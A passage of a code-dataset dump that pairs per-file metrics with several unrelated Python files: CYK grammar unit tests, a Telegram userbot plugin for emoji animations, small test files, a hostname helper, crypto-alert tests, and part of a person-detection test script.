| 0.08544
| 0.109852
| 0.134263
| 0.83871
| 0.83871
| 0.83871
| 0.83871
| 0.83871
| 0.83871
| 0
| 0.263849
| 0.128173
| 3,230
| 60
| 105
| 53.833333
| 0.550781
| 0.854489
| 0
| 0.111111
| 0
| 0
| 0.051836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.277778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0cb68a654e6d1e85ef73978d2a9c69ad6442c61c
| 3,998
|
py
|
Python
|
src/tests/cyk_test.py
|
Rimalon/formal-language-tasks
|
16f110dbb658e714261958544c3d748ad5a14a12
|
[
"MIT"
] | null | null | null |
src/tests/cyk_test.py
|
Rimalon/formal-language-tasks
|
16f110dbb658e714261958544c3d748ad5a14a12
|
[
"MIT"
] | 2
|
2020-09-08T12:09:47.000Z
|
2020-10-14T12:18:14.000Z
|
src/tests/cyk_test.py
|
Rimalon/formal-language-tasks
|
16f110dbb658e714261958544c3d748ad5a14a12
|
[
"MIT"
] | null | null | null |
import unittest
from pyformlang.cfg import Terminal, Variable
from src.classes import CNF
from src.main.CYK import cyk
# Grammar fixture paths, hard-coded for the Travis CI build image.
# NOTE(review): these absolute paths will not resolve outside that CI
# environment — consider deriving them from __file__ instead.
aSbS = '/home/travis/build/Rimalon/formal-language-tasks/src/tests/resources/grammar_aSbS_or_epsilon.txt'
aNbN = '/home/travis/build/Rimalon/formal-language-tasks/src/tests/resources/grammar_a^nb^n.txt'
task_1_grammar = '/home/travis/build/Rimalon/formal-language-tasks/src/tests/resources/task_4_3_1_grammar_example.txt'
# Terminal symbols shared by all the test cases below.
a = Terminal('a')
b = Terminal('b')
mult = Terminal('*')
plus = Terminal('+')
n = Terminal('n')
open = Terminal('(')  # NOTE(review): shadows the builtin ``open`` in this module
close = Terminal(')')
class CykTestCase(unittest.TestCase):
    """CYK membership tests against the fixture grammars.

    The accept/reject word lists for each grammar are shared between the
    plain and ``is_reduced`` loader variants via private helpers, instead
    of being duplicated verbatim in every test method.
    """

    def _check_aSbS(self, grammar):
        # Words accepted/rejected by the aSbS-or-epsilon grammar fixture.
        self.assertTrue(cyk([], grammar))
        self.assertTrue(cyk([a, b], grammar))
        self.assertTrue(cyk([a, a, b, b], grammar))
        self.assertTrue(cyk([a, a, a, b, b, b], grammar))
        self.assertTrue(cyk([a, a, a, a, a, b, b, b, b, b], grammar))
        self.assertTrue(cyk([a, b, a, b], grammar))
        self.assertFalse(cyk([a, b, a], grammar))
        self.assertFalse(cyk([a, a, a, a, b], grammar))
        self.assertFalse(cyk([a, b, b, b, b], grammar))
        self.assertFalse(cyk([a, a, a, a, a], grammar))
        self.assertFalse(cyk([b, b, b, b, b], grammar))

    def _check_aNbN(self, grammar):
        # Words accepted/rejected by the a^n b^n grammar fixture.
        self.assertTrue(cyk([], grammar))
        self.assertTrue(cyk([a, b], grammar))
        self.assertTrue(cyk([a, a, b, b], grammar))
        self.assertTrue(cyk([a, a, a, a, a, b, b, b, b, b], grammar))
        self.assertFalse(cyk([a, b, a, b], grammar))
        self.assertFalse(cyk([a, b, a], grammar))
        self.assertFalse(cyk([a, a, a, a, b], grammar))
        self.assertFalse(cyk([a, b, b, b, b], grammar))
        self.assertFalse(cyk([a, a, a, a, a], grammar))
        self.assertFalse(cyk([b, b, b, b, b], grammar))

    def test_aSbS_cyk(self):
        self._check_aSbS(CNF.from_file(aSbS))

    def test_aSbS_cyk_reduced(self):
        self._check_aSbS(CNF.from_file(aSbS, is_reduced=True))

    def test_aNbN_cyk(self):
        self._check_aNbN(CNF.from_file(aNbN))

    def test_aNbN_cyk_reduced(self):
        self._check_aNbN(CNF.from_file(aNbN, is_reduced=True))

    def test_task_4_3_1(self):
        # Arithmetic-expression grammar with start symbol E.
        grammar = CNF.from_file(task_1_grammar, Variable('E'))
        self.assertFalse(cyk([], grammar))
        self.assertTrue(cyk([open, n, plus, n, close, mult, n], grammar))
        self.assertTrue(cyk([n, plus, n, mult, n], grammar))
        self.assertTrue(cyk([n, plus, n, plus, n, plus, n], grammar))
        self.assertTrue(cyk([n, plus, open, n, mult, n, close, plus, n], grammar))
        self.assertFalse(cyk([n, plus, n, mult, n, close, plus, n], grammar))
        self.assertFalse(cyk([n, plus, open, n, mult, n, close, n], grammar))
        self.assertFalse(cyk([n, plus, open, n, mult, close, plus, n], grammar))
        self.assertFalse(cyk([plus, open, n, mult, n, close, plus, n], grammar))
# Allow running this test module directly with ``python cyk_test.py``.
if __name__ == '__main__':
    unittest.main()
| 44.921348
| 118
| 0.596048
| 609
| 3,998
| 3.844007
| 0.090312
| 0.044425
| 0.043571
| 0.277659
| 0.841094
| 0.816318
| 0.789406
| 0.739
| 0.734729
| 0.688167
| 0
| 0.002551
| 0.215608
| 3,998
| 88
| 119
| 45.431818
| 0.743941
| 0
| 0
| 0.538462
| 0
| 0.038462
| 0.074537
| 0.070535
| 0
| 0
| 0
| 0
| 0.653846
| 1
| 0.064103
| false
| 0
| 0.051282
| 0
| 0.128205
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b4f3f1111eca88078aaad0c140e84ae454a1b08
| 4,673
|
py
|
Python
|
userbot/modules/animasi7.py
|
Wiki28/WikixCilik
|
a7e8d684e34174001af3e69d1f00de4e98243abe
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/animasi7.py
|
Wiki28/WikixCilik
|
a7e8d684e34174001af3e69d1f00de4e98243abe
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/animasi7.py
|
Wiki28/WikixCilik
|
a7e8d684e34174001af3e69d1f00de4e98243abe
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#greyyvbss
import asyncio
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP
from userbot.utils import edit_or_reply, cilik_cmd
@cilik_cmd(pattern="cilik(?: |$)(.*)")
async def _(event):
    """Edit the triggering message through an 11-frame checkerboard banner."""
    if event.fwd_from:
        return
    animation_interval = 0.5
    animation_ttl = range(11)
    event = await edit_or_reply(event, "Cilik-Userbot....")
    animation_chars = [
        "⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
        "⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
        "⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
        "⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
        "⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
        "⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
        "⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
        "⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
        "⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
        "⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
        "⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        # Index with the real frame count; the original "% 192" only worked
        # by accident because i never exceeds 10.
        await event.edit(animation_chars[i % len(animation_chars)])
@cilik_cmd(pattern="city(?: |$)(.*)")
async def _(event):
    """Reply with a static emoji-art city scene (no animation loop)."""
    await edit_or_reply(
        event,
        """☁☁🌞 ☁ ☁
☁ ✈ ☁ 🚁 ☁ ☁ ☁ ☁ ☁ ☁
🏬🏨🏫🏢🏤🏥🏦🏪🏫
🌲/ l🚍\🌳👭
🌳/ 🚘 l 🏃 \🌴 👬 👬 🌴/ l 🚔 \🌲
🌲/ 🚖 l \
🌳/🚶 | 🚍 \ 🌴🚴🚴
🌴/ | \🌲"""
    )
@cilik_cmd(pattern="plane(?: |$)(.*)")
async def _(event):
    """Animate a plane flying across the message, one frame per 0.5 s."""
    if event.fwd_from:
        return
    animation_interval = 0.5
    animation_ttl = range(14)
    event = await edit_or_reply(event, "Wait for plane...")
    animation_chars = [
        "✈-------------",
        "-✈------------",
        "--✈-----------",
        "---✈----------",
        "----✈---------",
        "-----✈--------",
        "------✈-------",
        "-------✈------",
        "--------✈-----",
        "---------✈----",
        "----------✈---",
        "-----------✈--",
        "------------✈-",
        "-------------✈",
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        # Bug fix: the original used "% 12" against 14 frames, so frames 12
        # and 13 wrapped back to the start and the plane never reached the
        # right edge. Index by the real frame count instead.
        await event.edit(animation_chars[i % len(animation_chars)])
@cilik_cmd(pattern="police(?: |$)(.*)")
async def _(event):
    """Flash a 3x9 red/white/blue grid like a police beacon (11 frames)."""
    if event.fwd_from:
        return
    animation_interval = 0.3
    animation_ttl = range(11)
    event = await edit_or_reply(event, "Police")
    # Frames alternate the red and blue halves of the grid.
    animation_chars = [
        "🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
        "🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
        "🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
        "🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
        "🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
        "🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
        "🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
        "🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
        "🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
        "🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
        "🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        # i ranges over 0..10, so "% 11" matches the 11 frames exactly.
        await event.edit(animation_chars[i % 11])
# Register this plugin's commands in the bot's global help registry.
CMD_HELP.update(
    {
        "animasi7": f"➢ **Plugin : **`animasi7`\
\n\n ┌✪ **Command :** `{cmd}cilik`\
\n └✪ **Function : **Animasi Cilik Userbot.\
\n\n ┌✪ **Command :** `{cmd}city`\
\n └✪ **Function : **Mengirim Gambar Kota.\
\n\n ┌✪ **Command :** `{cmd}plane`\
\n └✪ **Function : **Mengirim Gambar Animasi Pesawat.\
\n\n ┌✪ **Command :** `{cmd}police`\
\n └✪ **Function : **Mengirim Gambar Animasi Polisi.\
"
    }
)
| 39.268908
| 143
| 0.28547
| 485
| 4,673
| 5.703093
| 0.173196
| 0.182936
| 0.190889
| 0.266088
| 0.841649
| 0.810195
| 0.768257
| 0.768257
| 0.768257
| 0.768257
| 0
| 0.005915
| 0.240317
| 4,673
| 118
| 144
| 39.601695
| 0.357746
| 0.001926
| 0
| 0.473684
| 0
| 0
| 0.482234
| 0.408629
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042105
| 0
| 0.073684
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f07c98981bb8f205ead60ed688b9882a5c31925f
| 433
|
py
|
Python
|
tests/unit/test_top_news_titles.py
|
matthewcheng222/COVID19_Smart_Alarm
|
3e19ed869a44707525aabfe96823f0f5db0efab4
|
[
"MIT"
] | null | null | null |
tests/unit/test_top_news_titles.py
|
matthewcheng222/COVID19_Smart_Alarm
|
3e19ed869a44707525aabfe96823f0f5db0efab4
|
[
"MIT"
] | null | null | null |
tests/unit/test_top_news_titles.py
|
matthewcheng222/COVID19_Smart_Alarm
|
3e19ed869a44707525aabfe96823f0f5db0efab4
|
[
"MIT"
] | null | null | null |
import top_news_titles
def test_top_news_titles_outputtype():
    """The news summary must come back as a plain string."""
    summary = top_news_titles.top_news_titles()
    assert isinstance(summary, str)
def test_top_news_titles_outputlength():
    """The news summary must not be empty."""
    summary = top_news_titles.top_news_titles()
    assert len(summary) > 0
def test_top_news_titles_outputuppercase():
    """The news summary must start with an uppercase letter."""
    first_char = top_news_titles.top_news_titles()[0]
    assert first_char.isupper()
def test_top_news_titles_outputword():
    """The news summary must open with the fixed phrase "Here are the"."""
    prefix = top_news_titles.top_news_titles()[:12]
    assert prefix == "Here are the"
| 30.928571
| 68
| 0.799076
| 67
| 433
| 4.656716
| 0.298507
| 0.291667
| 0.541667
| 0.179487
| 0.637821
| 0.38141
| 0.298077
| 0.211538
| 0
| 0
| 0
| 0.012887
| 0.103926
| 433
| 13
| 69
| 33.307692
| 0.791237
| 0
| 0
| 0
| 0
| 0
| 0.027714
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 1
| 0.444444
| true
| 0
| 0.111111
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
b2be6dc85d515619df14ccbf6d14d5d8b7add751
| 144
|
py
|
Python
|
src/utils.py
|
DeftWork/FlaskApp
|
cd9465e95df4eaa14ddd3a626134be91808e76a2
|
[
"MIT"
] | null | null | null |
src/utils.py
|
DeftWork/FlaskApp
|
cd9465e95df4eaa14ddd3a626134be91808e76a2
|
[
"MIT"
] | 4
|
2021-06-08T21:47:01.000Z
|
2022-03-12T00:35:17.000Z
|
src/utils.py
|
DeftWork/FlaskApp
|
cd9465e95df4eaa14ddd3a626134be91808e76a2
|
[
"MIT"
] | null | null | null |
import socket
def gethostname():
    """Return this machine's host name as reported by the OS resolver."""
    own_name = socket.gethostname()
    return own_name
def getlocaladdress():
    """Return the IPv4 address that this machine's own host name resolves to."""
    own_name = socket.gethostname()
    return socket.gethostbyname(own_name)
| 18
| 53
| 0.756944
| 14
| 144
| 7.785714
| 0.5
| 0.220183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 144
| 7
| 54
| 20.571429
| 0.879032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
653768702ac776de24377887b65c40f1056b46af
| 3,490
|
py
|
Python
|
test_main.py
|
joigno/cryptoalerts
|
e63da6f3b8d773325fd9604d0236b7fc50c7125c
|
[
"MIT"
] | null | null | null |
test_main.py
|
joigno/cryptoalerts
|
e63da6f3b8d773325fd9604d0236b7fc50c7125c
|
[
"MIT"
] | 1
|
2022-03-29T19:39:21.000Z
|
2022-03-29T19:39:21.000Z
|
test_main.py
|
joigno/cryptoalerts
|
e63da6f3b8d773325fd9604d0236b7fc50c7125c
|
[
"MIT"
] | null | null | null |
from main import run
import json
# Shared fixtures: all three tests use the same alert configuration and the
# same prices; only the portfolio holdings (and hence the expected output)
# differ.  Previously the alert JSON and the price dict were copy-pasted
# verbatim into every test.
_ALERTS_TEXT = '''
[
    {
        "portfolio": "volatility",
        "name": "cash-up",
        "type": "cash_percentage",
        "condition": ">",
        "value": "66.6",
        "recipient" : "joigno",
        "message" : "Cash Value of portfolio 'volatility' is above 66.6%",
        "min_trades_usd" : "10.0"
    },
    {
        "portfolio": "volatility",
        "name": "cash-down",
        "type": "cash_percentage",
        "condition": "<",
        "value": "33.3",
        "recipient" : "joigno",
        "message" : "Cash Value of portfolio 'volatility' is below 33.3%",
        "min_trades_usd" : "10.0"
    }
]
'''

_PRICES = {
    'bitcoin': 41704.0,
    'ethereum': 2935.0,
}


def _run_with_holdings(eth_amount, btc_amount):
    """Build the 'volatility' portfolio with the given ETH/BTC holdings (plus
    a fixed 5784.0 USD cash position) and run the alert engine against it.

    Amounts are passed as strings because the portfolio schema stores them
    as JSON strings.  Returns whatever main.run() returns (the alert text,
    or '' when no alert fires).
    """
    portfolio_text = '''
{
    "volatility": {
        "portfolio_assets": {
            "ethereum": {
                "amount": "%s"
            },
            "bitcoin": {
                "amount": "%s"
            },
            "usd": {
                "amount": "5784.0"
            }
        }
    }
}
''' % (eth_amount, btc_amount)
    alerts = json.loads(_ALERTS_TEXT)
    portfolio = json.loads(portfolio_text)
    return run(portfolio, alerts, _PRICES)


def test_below_percentage():
    """Cash share below 33.3% fires the cash-down alert with rebalance trades."""
    expected = '''Cash Value of portfolio 'volatility' is below 33.3%<br/>
<br/>
SELL 0.121080 ETHEREUM<br/>
BUY 0.009630 BITCOIN'''
    assert _run_with_holdings("0.4", "0.01") == expected


def test_above_percentage():
    """Cash share above 66.6% fires the cash-up alert with rebalance trades."""
    expected = '''Cash Value of portfolio 'volatility' is above 66.6%<br/>
<br/>
SELL 2.359061 ETHEREUM<br/>
BUY 0.015484 BITCOIN'''
    assert _run_with_holdings("4.0", "0.1") == expected


def test_good_percentage():
    """Cash share within (33.3%, 66.6%) produces no alert output at all."""
    assert _run_with_holdings("1.0", "0.005") == ''
| 20.898204
| 70
| 0.516046
| 361
| 3,490
| 4.880886
| 0.163435
| 0.150965
| 0.049943
| 0.090806
| 0.902384
| 0.902384
| 0.902384
| 0.902384
| 0.902384
| 0.893303
| 0
| 0.060985
| 0.290544
| 3,490
| 166
| 71
| 21.024096
| 0.650646
| 0
| 0
| 0.620253
| 0
| 0
| 0.737959
| 0
| 0
| 0
| 0
| 0
| 0.018987
| 1
| 0.018987
| false
| 0
| 0.012658
| 0
| 0.031646
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
334106c5e33551e11c8ead2410be7e48b4581a0c
| 9,822
|
py
|
Python
|
detection/tester.py
|
mataevs/persondetector
|
08d21862474989cfc64bd182321b1eebf0cbd12b
|
[
"MIT"
] | null | null | null |
detection/tester.py
|
mataevs/persondetector
|
08d21862474989cfc64bd182321b1eebf0cbd12b
|
[
"MIT"
] | null | null | null |
detection/tester.py
|
mataevs/persondetector
|
08d21862474989cfc64bd182321b1eebf0cbd12b
|
[
"MIT"
] | null | null | null |
__author__ = 'mataevs'
import tester_hog
import tester_icf
import cv2
import random
import utils
import os
import detection_checker
import optical_flow
from collections import Counter
import time
def test_multiscale(
hog_classifier_file,
icf_classifier_file,
hog_result_dir,
icf_result_dir,
no_samples):
hog_classifier = tester_hog.load_classifier(hog_classifier_file)
icf_classifier = tester_icf.load_classifier(icf_classifier_file)
filepaths = [
"/home/mataevs/captures/metadata/dump_05_05_01_50",
"/home/mataevs/captures/metadata/dump_05_06_13_10",
"/home/mataevs/captures/metadata/dump_10_06_11_47",
"/home/mataevs/captures/metadata/dump_05_05_01_51",
"/home/mataevs/captures/metadata/dump_05_06_13_15",
"/home/mataevs/captures/metadata/dump_07_05_11_40",
"/home/mataevs/captures/metadata/dump_10_06_11_48",
"/home/mataevs/captures/metadata/dump_05_05_11_54",
"/home/mataevs/captures/metadata/dump_05_06_13_20",
"/home/mataevs/captures/metadata/dump_07_05_11_46",
"/home/mataevs/captures/metadata/dump_10_06_12_16",
"/home/mataevs/captures/metadata/dump_05_06_12_57",
"/home/mataevs/captures/metadata/dump_05_06_13_21",
"/home/mataevs/captures/metadata/dump_05_06_13_24",
"/home/mataevs/captures/metadata/dump_16_06_14_57",
"/home/mataevs/captures/metadata/dump_05_06_13_25",
"/home/mataevs/captures/metadata/dump_07_05_12_03",
"/home/mataevs/captures/metadata/dump_16_06_15_26",
"/home/mataevs/captures/metadata/dump_05_06_13_28",
"/home/mataevs/captures/metadata/dump_07_05_12_05"
]
if not os.path.exists(hog_result_dir):
os.makedirs(hog_result_dir)
if not os.path.exists(icf_result_dir):
os.makedirs(icf_result_dir)
testImages = utils.getFullImages(*filepaths)
metadata = utils.parseMetadata(*filepaths)
scales = [
[0.45, 0.5, 0.55],
[0.4, 0.45, 0.5],
[0.3, 0.35],
[0.3]
]
scaleSteps = [35, 45, 65, 90]
for sample in range(0, no_samples):
print "### Sample " + str(sample) + " ###"
imgPath = random.choice(testImages)
img = cv2.imread(imgPath)
tilt = int(metadata[imgPath]['tilt'])
if tilt > 90:
tilt = 90 - (tilt - 90)
imgScales = []
for i in range(0, len(scaleSteps)):
if tilt < scaleSteps[i]:
imgScales = scales[i]
break
print imgScales
prev_img_path = utils.get_prev_img(imgPath)
prev_img = cv2.imread(prev_img_path)
flow_rgb, boundingRect = optical_flow.optical_flow(img, prev_img)
height, width, _ = img.shape
bestWindowsHog = tester_hog.test_img(hog_classifier, imgPath, imgScales, allPositive=True, flow_rgb=flow_rgb, subwindow=boundingRect)
if bestWindowsHog != None and bestWindowsHog != []:
scale = bestWindowsHog[0][4]
img_hog = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_hog.shape[1], img_hog.shape[0], scale)
cv2.rectangle(img_hog, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
utils.draw_detections(img_hog, bestWindowsHog)
else:
scale = 0.5
img_hog = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_hog.shape[1], img_hog.shape[0], scale)
cv2.rectangle(img_hog, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
cv2.imwrite(hog_result_dir + "/sample_2_" + str(sample) + ".jpg", img_hog)
bestWindowsIcf = tester_icf.test_img(icf_classifier, imgPath, imgScales, allPositive=True, subwindow=boundingRect)
if bestWindowsIcf != None and bestWindowsIcf != []:
scale = bestWindowsIcf[0][4]
img_icf = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_icf.shape[1], img_icf.shape[0], scale)
cv2.rectangle(img_icf, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
utils.draw_detections(img_icf, bestWindowsIcf)
else:
scale = 0.5
img_icf = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_icf.shape[1], img_icf.shape[0], scale)
cv2.rectangle(img_icf, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
cv2.imwrite(icf_result_dir + "/sample_2_" + str(sample) + ".jpg", img_icf)
def test_multiscale_checker(
        hog_classifier_file,
        icf_classifier_file,
        hog_result_dir,
        icf_result_dir,
        checker,
        resultsFile):
    """Run the HOG classifier over every annotated frame supplied by
    *checker*, save the annotated images into hog_result_dir, and append a
    per-image "tp= fp= fn=" line to the file resultsFile + "hog.txt".

    Fixes vs. the previous revision: the results file is now guaranteed to be
    closed (the old ``resultsHog.close()`` call was commented out, leaking the
    handle and risking unflushed output), ``!= None`` comparisons use
